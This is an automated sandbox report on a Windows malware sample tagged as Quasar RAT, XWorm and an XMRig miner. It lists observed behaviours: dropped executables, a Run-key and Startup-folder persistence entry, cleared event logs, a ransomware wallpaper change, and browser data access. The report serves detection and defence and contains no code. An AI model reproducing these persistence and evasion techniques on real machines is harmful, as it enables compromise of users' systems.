Malware Analysis Report

2025-08-05 15:10

Sample ID 250503-tqq3hswsgw
Target primate protocol.exe
SHA256 fdcf99d6435929609f8d5625e4d24357bdc3949d9336901fa0daa7c494284a75
Tags
quasar xmrig xworm client defense_evasion discovery execution miner persistence privilege_escalation ransomware rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fdcf99d6435929609f8d5625e4d24357bdc3949d9336901fa0daa7c494284a75

Threat Level: Known bad

The file primate protocol.exe was found to be: Known bad.

Malicious Activity Summary

quasar xmrig xworm client defense_evasion discovery execution miner persistence privilege_escalation ransomware rat spyware stealer trojan upx

xmrig

Suspicious use of NtCreateUserProcessOtherParentProcess

Xworm

Xworm family

Xmrig family

Quasar payload

Detect Xworm Payload

Quasar RAT

Quasar family

XMRig Miner payload

Creates new service(s)

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Indicator Removal: Clear Windows Event Logs

Drops startup file

Checks computer location settings

Reads user/profile data of web browsers

Checks BIOS information in registry

Obfuscated Files or Information: Command Obfuscation

Adds Run key to start application

Suspicious use of SetThreadContext

Sets desktop wallpaper using registry

Drops file in System32 directory

UPX packed file

Drops file in Windows directory

Launches sc.exe

System Location Discovery: System Language Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Browser Information Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Scheduled Task/Job: Scheduled Task

Checks SCSI registry key(s)

Suspicious use of UnmapMainImage

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Delays execution with timeout.exe

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Checks processor information in registry

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Reported

2025-05-03 16:16

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-05-03 16:15

Reported

2025-05-03 16:18

Platform

win10v2004-20250502-en

Max time kernel

133s

Max time network

149s

Command Line

winlogon.exe

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4480 created 616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 5052 created 616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Creates new service(s)

persistence execution

Stops running service(s)

defense_evasion execution

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\primate protocol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\Windows\CompPkg.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\Windows\systemprocess.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe C:\Windows\CompPkg.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe C:\Windows\CompPkg.exe N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion
Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx C:\Windows\System32\svchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CompPkg = "C:\\Users\\Admin\\AppData\\Roaming\\CompPkg.exe" C:\Windows\CompPkg.exe N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ENC.img" C:\Windows\CompPkg.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\systemprocess.exe C:\Users\Admin\AppData\Local\Temp\primate protocol.exe N/A
File created C:\Windows\host.exe C:\Users\Admin\AppData\Local\Temp\primate protocol.exe N/A
File created C:\Windows\CompPkg.exe C:\Users\Admin\AppData\Local\Temp\primate protocol.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\primate protocol.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\Explorer.EXE N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133907626609832177" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1746289067" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1153236273-2212388449-1493869963-1000\{C39E5D0C-9F5A-4087-ACFB-9AFB8511C36F} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
